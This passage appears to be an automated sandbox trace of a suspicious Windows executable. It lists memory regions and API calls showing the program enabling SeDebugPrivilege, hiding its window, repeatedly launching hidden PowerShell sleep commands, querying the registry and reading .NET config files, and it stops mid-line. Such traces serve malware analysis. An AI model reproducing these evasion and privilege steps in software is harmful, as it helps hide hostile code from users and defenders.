= 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13259 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13260 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13261 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13262 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13263 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13264 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13265 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13266 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13267 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 13268 start_va = 0xd10000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 13269 start_va = 0xd20000 end_va = 0xd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 13270 start_va = 0xd30000 end_va = 0xd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 13271 start_va = 0xd40000 end_va = 0xd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 13272 start_va = 0xd50000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 13273 start_va = 0xd60000 end_va = 0xd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 13274 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13275 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13276 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13277 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13278 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13279 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13280 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13281 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13282 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13283 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 13284 start_va = 0xd10000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 13285 start_va = 0xd20000 end_va = 0xd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 13286 start_va = 0xd30000 end_va = 0xd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 13287 start_va = 0xd40000 end_va = 0xd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 13288 start_va = 0xd50000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 13293 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13294 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13295 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13296 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 13297 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13298 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13299 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13300 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13301 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13302 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13303 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 13304 start_va = 0xd10000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 13305 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13306 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13307 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13308 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13309 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13310 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13311 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13312 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13313 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13314 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13315 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13316 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 13317 start_va = 0xd10000 end_va = 0xd1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 13318 start_va = 0xd20000 end_va = 0xd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 13319 start_va = 0xd30000 end_va = 0xd3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 13320 start_va = 0xd40000 end_va = 0xd4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 13321 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13322 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13323 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13324 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13325 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13326 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 13327 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13328 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13329 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13330 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13331 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13332 start_va = 0xd00000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 13333 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13334 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13335 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 13336 start_va = 0xce0000 end_va = 0xceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 13337 start_va = 0xcf0000 end_va = 0xcfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 13338 start_va = 0xcd0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Thread: id = 151 os_tid = 0xfc4 [0143.122] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0143.443] RoInitialize () returned 0x1 [0143.443] RoUninitialize () returned 0x0 [0144.688] GetCurrentProcessId () returned 0x6d8 [0144.698] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x7fe1b0 | out: lpLuid=0x7fe1b0*(LowPart=0x14, HighPart=0)) returned 1 [0144.710] GetCurrentProcess () returned 0xffffffffffffffff [0144.711] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x7fe1a8 | out: TokenHandle=0x7fe1a8*=0x25c) returned 1 [0144.711] AdjustTokenPrivileges (in: TokenHandle=0x25c, DisableAllPrivileges=0, NewState=0x2aa44f0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0144.713] CloseHandle (hObject=0x25c) returned 1 [0144.789] EnumWindows (lpEnumFunc=0x85085c, lParam=0x0) returned 0 [0144.793] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x768 [0144.793] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x6b8 [0144.793] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x69c [0144.793] GetWindowThreadProcessId (in: hWnd=0x100a4, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x69c [0144.793] GetWindowThreadProcessId (in: hWnd=0x100a8, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x69c [0144.794] GetWindowThreadProcessId (in: hWnd=0x100b4, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x69c [0144.794] GetWindowThreadProcessId (in: hWnd=0x100be, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x69c [0144.794] GetWindowThreadProcessId (in: hWnd=0x100c2, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x69c [0144.794] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x69c [0144.794] GetWindowThreadProcessId (in: hWnd=0x10098, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x69c [0144.794] GetWindowThreadProcessId (in: hWnd=0x100bc, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x69c [0144.794] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x69c [0144.794] GetWindowThreadProcessId (in: hWnd=0x20048, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x8bc [0144.795] GetWindowThreadProcessId (in: hWnd=0x100d6, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x644 [0144.795] GetWindowThreadProcessId (in: hWnd=0x100cc, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0x69c [0144.795] GetWindowThreadProcessId (in: hWnd=0x302c6, lpdwProcessId=0x7fedc0 | out: lpdwProcessId=0x7fedc0) returned 0xfc4 [0144.795] GetWindow (hWnd=0x302c6, uCmd=0x4) returned 0x0 [0144.796] IsWindowVisible (hWnd=0x302c6) returned 1 [0144.806] ShowWindow (hWnd=0x302c6, nCmdShow=0) returned 1 [0145.003] LocalAlloc (uFlags=0x0, uBytes=0x16) returned 0x9c3830 [0145.003] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x9bfe20 [0145.123] ShellExecuteExW (in: pExecInfo=0x2aa67f8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Start-Sleep -s 5", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2aa67f8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Start-Sleep -s 5", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x420)) returned 1 [0146.522] LocalFree (hMem=0x9c3830) returned 0x0 [0146.522] LocalFree (hMem=0x9bfe20) returned 0x0 [0146.551] GetCurrentProcess () returned 0xffffffffffffffff [0146.551] GetCurrentProcess () returned 0xffffffffffffffff [0146.553] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x420, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x7fef80, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x7fef80*=0x32c) returned 1 [0146.557] CoWaitForMultipleHandles (dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x7fee30*=0x32c, lpdwindex=0x7fec04) [0198.794] CloseHandle (hObject=0x32c) returned 1 [0198.798] LocalAlloc (uFlags=0x0, uBytes=0x16) returned 0xa083e0 [0198.798] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x9f8a00 [0198.798] ShellExecuteExW (in: pExecInfo=0x2aa6b50*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Start-Sleep -s 5", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2aa6b50*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Start-Sleep -s 5", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x444)) returned 1 [0198.918] LocalFree (hMem=0xa083e0) returned 0x0 [0198.918] LocalFree (hMem=0x9f8a00) returned 0x0 [0198.918] GetCurrentProcess () returned 0xffffffffffffffff [0198.918] GetCurrentProcess () returned 0xffffffffffffffff [0198.918] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x444, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x7fef80, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x7fef80*=0x32c) returned 1 [0198.919] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x7fee30*=0x32c, lpdwindex=0x7fec04 | out: lpdwindex=0x7fec04) returned 0x0 [0241.852] CloseHandle (hObject=0x32c) returned 1 [0241.854] LocalAlloc (uFlags=0x0, uBytes=0x16) returned 0x9dce00 [0241.854] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x9cc600 [0241.854] ShellExecuteExW (in: pExecInfo=0x2aa6e38*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Start-Sleep -s 5", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2aa6e38*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Start-Sleep -s 5", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x448)) returned 1 [0241.923] LocalFree (hMem=0x9dce00) returned 0x0 [0241.923] LocalFree (hMem=0x9cc600) returned 0x0 [0241.923] GetCurrentProcess () returned 0xffffffffffffffff [0241.923] GetCurrentProcess () returned 0xffffffffffffffff [0241.923] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x448, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x7fef80, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x7fef80*=0x32c) returned 1 [0241.924] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x7fee30*=0x32c, lpdwindex=0x7fec04 | out: lpdwindex=0x7fec04) returned 0x0 [0279.342] CloseHandle (hObject=0x32c) returned 1 [0279.442] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x32c [0279.444] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e4 [0279.463] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x7fd038 | out: phkResult=0x7fd038*=0x340) returned 0x0 [0279.464] RegQueryValueExW (in: hKey=0x340, lpValueName="InstallationType", lpReserved=0x0, lpType=0x7fd088, lpData=0x0, lpcbData=0x7fd080*=0x0 | out: lpType=0x7fd088*=0x1, lpData=0x0, lpcbData=0x7fd080*=0xe) returned 0x0 [0279.465] RegQueryValueExW (in: hKey=0x340, lpValueName="InstallationType", lpReserved=0x0, lpType=0x7fd088, lpData=0x2aa8510, lpcbData=0x7fd080*=0xe | out: lpType=0x7fd088*=0x1, lpData="Client", lpcbData=0x7fd080*=0xe) returned 0x0 [0279.466] RegCloseKey (hKey=0x340) returned 0x0 [0279.718] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x7fc720, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16 [0279.720] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9DC0.exe.config", nBufferLength=0x105, lpBuffer=0x7fc740, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9DC0.exe.config", lpFilePart=0x0) returned 0x38 [0279.722] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9DC0.exe.config", nBufferLength=0x105, lpBuffer=0x7fc630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9DC0.exe.config", lpFilePart=0x0) returned 0x38 [0279.888] GetCurrentProcess () returned 0xffffffffffffffff [0279.889] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fca48 | out: TokenHandle=0x7fca48*=0x340) returned 1 [0279.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x7fc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\", lpFilePart=0x0) returned 0x30 [0279.896] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x7fcb00 | out: lpFileInformation=0x7fcb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0279.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x7fc480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0279.899] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x7fcae8 | out: lpFileInformation=0x7fcae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fdfbae, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x982bc0b8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x982bc0b8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0279.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x7fc480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x45 [0279.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x7fc960) returned 1 [0279.902] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x334 [0279.903] GetFileType (hFile=0x334) returned 0x1 [0279.903] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7fc8d0) returned 1 [0279.903] GetFileType (hFile=0x334) returned 0x1 [0279.922] GetFileSize (in: hFile=0x334, lpFileSizeHigh=0x7fca38 | out: lpFileSizeHigh=0x7fca38*=0x0) returned 0x8c8f [0279.923] ReadFile (in: hFile=0x334, lpBuffer=0x2aae8f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7fc9a8, lpOverlapped=0x0 | out: lpBuffer=0x2aae8f8*, lpNumberOfBytesRead=0x7fc9a8*=0x1000, lpOverlapped=0x0) returned 1 [0279.961] ReadFile (in: hFile=0x334, lpBuffer=0x2aae8f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7fc788, lpOverlapped=0x0 | out: lpBuffer=0x2aae8f8*, lpNumberOfBytesRead=0x7fc788*=0x1000, lpOverlapped=0x0) returned 1 [0279.962] ReadFile (in: hFile=0x334, lpBuffer=0x2aae8f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7fc578, lpOverlapped=0x0 | out: lpBuffer=0x2aae8f8*, lpNumberOfBytesRead=0x7fc578*=0x1000, lpOverlapped=0x0) returned 1 [0279.963] ReadFile (in: hFile=0x334, lpBuffer=0x2aae8f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7fc578, lpOverlapped=0x0 | out: lpBuffer=0x2aae8f8*, lpNumberOfBytesRead=0x7fc578*=0x1000, lpOverlapped=0x0) returned 1 [0279.964] ReadFile (in: hFile=0x334, lpBuffer=0x2aae8f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7fc578, lpOverlapped=0x0 | out: lpBuffer=0x2aae8f8*, lpNumberOfBytesRead=0x7fc578*=0x1000, lpOverlapped=0x0) returned 1 [0279.965] ReadFile (in: hFile=0x334, lpBuffer=0x2aae8f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7fc438, lpOverlapped=0x0 | out: lpBuffer=0x2aae8f8*, lpNumberOfBytesRead=0x7fc438*=0x1000, lpOverlapped=0x0) returned 1 [0279.971] ReadFile (in: hFile=0x334, lpBuffer=0x2aae8f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7fc678, lpOverlapped=0x0 | out: lpBuffer=0x2aae8f8*, lpNumberOfBytesRead=0x7fc678*=0x1000, lpOverlapped=0x0) returned 1 [0279.973] ReadFile (in: hFile=0x334, lpBuffer=0x2aae8f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7fc528, lpOverlapped=0x0 | out: lpBuffer=0x2aae8f8*, lpNumberOfBytesRead=0x7fc528*=0x1000, lpOverlapped=0x0) returned 1 [0279.973] ReadFile (in: hFile=0x334, lpBuffer=0x2aae8f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7fc528, lpOverlapped=0x0 | out: lpBuffer=0x2aae8f8*, lpNumberOfBytesRead=0x7fc528*=0xc8f, lpOverlapped=0x0) returned 1 [0279.973] ReadFile (in: hFile=0x334, lpBuffer=0x2aae8f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x7fc648, lpOverlapped=0x0 | out: lpBuffer=0x2aae8f8*, lpNumberOfBytesRead=0x7fc648*=0x0, lpOverlapped=0x0) returned 1 [0279.973] CloseHandle (hObject=0x334) returned 1 [0279.975] GetCurrentProcess () returned 0xffffffffffffffff [0279.975] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fcc48 | out: TokenHandle=0x7fcc48*=0x334) returned 1 [0279.976] GetCurrentProcess () returned 0xffffffffffffffff [0279.976] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fcc48 | out: TokenHandle=0x7fcc48*=0x39c) returned 1 [0279.976] GetCurrentProcess () returned 0xffffffffffffffff [0279.977] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x7fca48 | out: TokenHandle=0x7fca48*=0x33c) returned 1 [0279.977] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\9DC0.exe.config" (normalized: 